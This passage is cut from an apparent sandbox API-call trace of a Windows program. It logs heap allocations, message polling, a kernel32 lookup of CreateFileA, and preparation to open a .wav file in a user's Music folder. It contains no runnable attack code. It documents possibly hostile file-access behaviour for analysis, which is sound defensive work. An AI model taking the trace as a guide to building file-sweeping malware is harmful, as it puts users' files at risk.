dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0187.993] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0187.993] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdac8 | out: hHeap=0x8a0000) returned 1 [0187.993] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0187.993] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de970 | out: hHeap=0x8a0000) returned 1 [0187.994] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0187.994] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea38 | out: hHeap=0x8a0000) returned 1 [0187.994] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0187.994] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1930 | out: hHeap=0x8a0000) returned 1 [0187.994] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de650 | out: hHeap=0x8a0000) returned 1 [0187.994] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0187.994] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2a0 | out: hHeap=0x8a0000) returned 1 [0187.994] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de308 | out: hHeap=0x8a0000) returned 1 [0187.994] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0187.994] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ad98 | out: hHeap=0x8a0000) returned 1 [0187.994] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0187.994] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0187.994] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1930 [0187.994] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0187.994] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de308 [0187.994] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0187.994] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de308 | out: hHeap=0x8a0000) returned 1 [0187.994] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0187.994] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de308 [0187.994] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1960 [0187.994] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de650 [0187.994] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2a0 [0187.994] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ad0 [0187.995] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1990 [0187.995] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1990 | out: hHeap=0x8a0000) returned 1 [0187.995] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd960 [0187.995] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0187.995] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd738 [0187.995] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea38 [0187.995] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7c8 [0187.995] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0187.995] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdac8 [0187.995] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0187.995] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db0f0 [0187.995] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0187.995] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1990 [0187.995] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de970 [0187.995] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0187.995] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0187.995] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0187.995] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0187.995] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0187.995] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0187.995] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0187.995] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0187.995] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd930 [0187.996] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0187.996] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0187.996] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0187.996] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd720 [0187.996] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0187.996] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0187.996] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0187.996] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd990 [0187.996] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0187.996] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0187.996] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0187.996] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0187.996] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0187.996] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0187.996] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0187.996] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0187.996] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0187.996] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea10 [0187.996] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0187.996] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a20 [0187.996] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0187.996] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0187.996] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a20 [0187.997] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0187.997] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0187.997] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0187.997] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea10 | out: hHeap=0x8a0000) returned 1 [0187.997] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0187.997] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0187.997] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0187.997] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0187.997] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0187.997] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db138 [0187.997] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de970 | out: hHeap=0x8a0000) returned 1 [0187.997] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd630 [0187.997] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0187.997] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0187.997] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0187.997] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0187.997] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8e8 [0187.997] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0187.997] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0187.997] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0187.997] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0187.997] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3d8 [0187.997] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0187.997] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0187.998] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0187.998] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0187.998] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0187.998] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0187.998] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f58 [0187.998] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0187.998] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0187.998] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0187.998] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0187.998] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0187.998] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0187.998] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd570 [0187.998] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0187.998] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0187.998] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0187.998] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x80) returned 0x9c0b78 [0187.998] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0187.998] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd330 [0187.998] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0187.998] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0187.998] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18c0 [0187.998] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd900 [0187.998] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0187.998] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f70 [0187.998] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0187.999] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0187.999] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0187.999] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0187.999] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0187.999] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0187.999] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0187.999] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de970 [0187.999] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0187.999] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0187.999] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0187.999] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0187.999] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f70 [0187.999] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0187.999] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0187.999] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0187.999] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0187.999] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0187.999] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f70 [0187.999] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0187.999] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0187.999] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0187.999] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0187.999] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0187.999] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0188.000] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0188.000] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0188.000] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0188.000] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0188.000] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0188.000] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f70 [0188.000] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0188.000] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0188.000] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0188.000] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0188.000] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0188.000] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f70 [0188.000] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0188.000] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19d0 [0188.000] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0188.000] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0188.000] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0188.000] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0188.000] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19d0 | out: hHeap=0x8a0000) returned 1 [0188.000] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19d0 [0188.000] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0188.000] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0188.000] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0188.000] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f70 [0188.001] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0188.001] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0188.001] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0188.001] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0188.001] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0188.001] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f70 [0188.001] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0188.001] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0188.001] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0188.001] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0188.001] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0188.001] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0188.001] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0188.001] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0188.001] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0188.001] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0188.001] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0188.001] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f70 [0188.001] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0188.001] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0188.001] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0188.001] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0188.001] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0188.002] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f70 [0188.002] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0188.002] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0188.002] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xb) returned 0x9bd888 [0188.002] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x9bd888, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFile", lpUsedDefaultChar=0x0) returned 11 [0188.002] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0188.002] GetProcAddress (hModule=0x75990000, lpProcName="CreateFile") returned 0x0 [0188.002] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0188.002] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0188.002] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0188.002] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea10 [0188.002] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f70 [0188.002] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0188.002] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0188.002] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd888 [0188.002] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x9bd888, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileA", lpUsedDefaultChar=0x0) returned 12 [0188.002] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0188.003] GetProcAddress (hModule=0x75990000, lpProcName="CreateFileA") returned 0x759a53c6 [0188.003] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0188.003] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0188.003] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea10 | out: hHeap=0x8a0000) returned 1 [0188.003] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0188.003] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea10 [0188.003] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0188.003] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0188.003] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0188.003] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0188.003] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0188.003] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0188.003] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0188.003] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10001) returned 0xbca008 [0188.003] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\v6HGG6Br4L.wav", cchWideChar=69, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 69 [0188.003] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x45) returned 0x9aa548 [0188.003] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\v6HGG6Br4L.wav", cchWideChar=69, lpMultiByteStr=0x9aa548, cbMultiByte=69, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\v6HGG6Br4L.wav", lpUsedDefaultChar=0x0) returned 69 [0188.003] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa548 | out: hHeap=0x8a0000) returned 1 [0188.003] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0188.003] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0188.003] 